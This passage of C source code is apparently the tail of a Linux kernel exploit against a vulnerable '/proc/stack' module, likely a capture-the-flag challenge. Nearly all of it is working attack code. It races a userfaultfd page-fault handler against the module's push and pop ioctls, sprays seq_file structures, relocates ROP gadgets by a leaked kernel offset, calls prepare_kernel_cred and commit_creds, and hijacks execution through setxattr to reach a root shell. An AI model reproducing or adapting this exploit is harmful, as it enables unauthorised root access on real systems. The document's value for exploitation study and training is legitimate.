                *rop++ = user_ss;
                read(seq_fd, page, 0xdeadbeef);
                break;
            }
        }

        copy.src = (size_t)page;
        copy.dst = (size_t)msg.arg.pagefault.address & ~(0x1000 - 1);
        copy.len = 0x1000;
        copy.mode = 0;
        copy.copy = 0;
        ioctl(uffd, UFFDIO_COPY, &copy);
    }
    return NULL;
}

void pwn() {

    for (int i = 0; i < 0x100; i++)
        fill_seq_fd[i] = open("/proc/self/stat", O_RDONLY);

    fd = open("/proc/stack", O_RDWR);
    void *buf = mmap(0, 0x3000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
    ioctl(fd, PUSH, "Wings");

    set_cpu(0);
    register_userfaultfd(buf, 0x3000, fault_handler_thread);

    ioctl(fd, POP, buf);

    seq_fd = open("/proc/self/stat", O_RDONLY);
    ioctl(fd, PUSH, buf + 0x1000);
    printvar(success, "kernel offset", kernel_offset);
    xchg_eax_esp_ret_0x148d += kernel_offset;
    pop_rdi_ret += kernel_offset;
    prepare_kernel_cred += kernel_offset;
    commit_creds += kernel_offset;
    push_rax_pop_rdi_ret += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode += kernel_offset;

    size_t *hijack = buf + 0x2000 - 0x8;
    *hijack = xchg_eax_esp_ret_0x148d;
    setxattr("/exp", "Wings", hijack, 0x20, 0);
}

int main() {
    signal(SIGSEGV, get_root_shell);
    save_status();
    pwn();
    return 0;
}